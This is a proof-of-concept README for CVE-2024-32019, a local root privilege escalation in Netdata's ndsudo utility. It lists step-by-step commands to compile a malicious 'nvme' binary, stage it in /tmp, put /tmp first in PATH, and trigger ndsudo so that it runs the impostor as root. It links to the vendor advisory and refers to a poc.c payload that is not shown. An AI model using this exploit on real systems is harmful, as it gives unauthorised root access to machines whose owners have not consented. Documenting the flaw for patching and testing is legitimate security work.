POC for netdata ndsudo vulnerability - CVE-2024-32019
# Privilege Escalation via `ndsudo` (Netdata Local Exploit)
This POC is used to exploit a vulnerable `ndsudo` utility bundled with Netdata to escalate local privileges to root. The exploit works by injecting a malicious binary into the user’s `PATH` that impersonates a trusted command (`nvme`) and is executed with root privileges by `ndsudo`.
---
## Prerequisites & Assumptions
- You have **local shell access** on the target system.
- You can execute the following command but it fails with a "not found" or similar error:
```bash
./ndsudo nvme-list
```
---
### 1. Compile the Malicious Payload
On your **attacker machine** (or the vulnerable system if it has a compiler), compile the binary (for example, from the file `poc.c` in the repository):
```bash
gcc poc.c -o nvme
```
This binary should be crafted to spawn a root shell or execute arbitrary commands with root privileges.
---
### 2. Transfer the Payload to the Target System
Move or upload the compiled `nvme` binary to a directory writable by your user, such as `/tmp`:
```bash
scp nvme user@target:/tmp/
# or use any file upload method you have
```
---
### 3. Prepare the Payload for Execution
On the **target system**, make sure the binary is executable and prepend its directory to your `PATH`:
```bash
chmod +x /tmp/nvme
export PATH=/tmp:$PATH
```
This ensures `ndsudo` will resolve and execute your malicious `nvme` instead of the legitimate one.
---
### 4. Trigger `ndsudo` to Execute Your Payload
Run the vulnerable command to trigger `ndsudo`:
```bash
./ndsudo nvme-list
```
---
## Resources
- Netdata Github Advisory: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
[4.0K] /data/pocs/2158841016aaed447a34af7cd74129a86616c216
├── [ 114] poc.c
└── [1.7K] README.md
0 directories, 2 files